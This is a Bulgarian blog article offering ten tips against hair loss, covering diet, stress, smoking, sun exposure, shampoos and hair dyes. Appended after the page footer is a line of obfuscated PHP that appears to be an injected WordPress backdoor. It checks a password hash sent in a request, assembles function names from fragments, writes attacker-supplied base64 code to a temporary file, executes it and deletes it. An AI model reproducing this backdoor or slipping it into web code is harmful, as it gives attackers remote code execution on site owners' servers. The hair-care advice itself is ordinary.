10 съвета срещу косопад | Косопад

10 съвета срещу косопад

Когато се появи обезпокоителен косопад, първо трябва да разберем какво го причинява – вариантите са много и различни. Стрес, хормонални проблеми, раждане, и пр.

kosa-luk

Нека разгледаме няколко съвета, кои ща ни предпазят от косопада:

1 . Хранете се здравословно. Това е едно от първите неща, които трябва да проверим, ако се появи косопад. Трябва да ядем храни с повече протеини и цинк . Протеините са важни за растежа на косата. Най- полезни са тези, които се съдържат в рибата, яйцата или соята.
2 . Забравете за стреса. Един от честите причинители на оплешивяване. Открийте своя начин за справяне със стреса.
3 . Алкохол и цигари. Те пречат на растежа на косата, изсушават фоликулите, подпомагат косопада и пречат на новата коса да се появи.
4. Тренирайте. Спортът стимулира кръвообращението, което е важно, за да имаме здрав скалп и косата да се подхранва.
5 . Грижи за косата. Няма полза от гореизброените съвети, като не полагате правилните грижи за косата си.kosa-slance Употребата на сешоари, преси, редовно и без защита, изсушават косата и я правят слаба.
6 . Пазете се от слънце. Не само уврежда кожата, но същото важи и за косата. Силното слънце може да изгори скалпа, отслабва косата и пречи на растежа. Слагайте шапка, ако се излагате на силно слънце.
7 . Не всички шампоани за добри. Търсете натурални шампоани, които съдържат лечебни растения, полезни за косата.
8. Не я вързвайте, докато е мокра. Лесно се раши косата, ако я вържем, докато е мокра. Но най- добре я оставете пусната, докато изсъхне.
9. Вързвайте я, докато спите. Ако имате дълга коса, вързвайте я, когато лягате да спите, защото на сутринта ще е оплетена и трудно ще се разреше. Търканите във възглавницата също не е препоръчително. Най- добре я хващайте на плитка.
10. Избягвайте боите. Боите правят косата слаба и улесняват падането й. Вместо боя, използвайте кана, която е натурален продукт.

28. май 2014 13:29:17 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}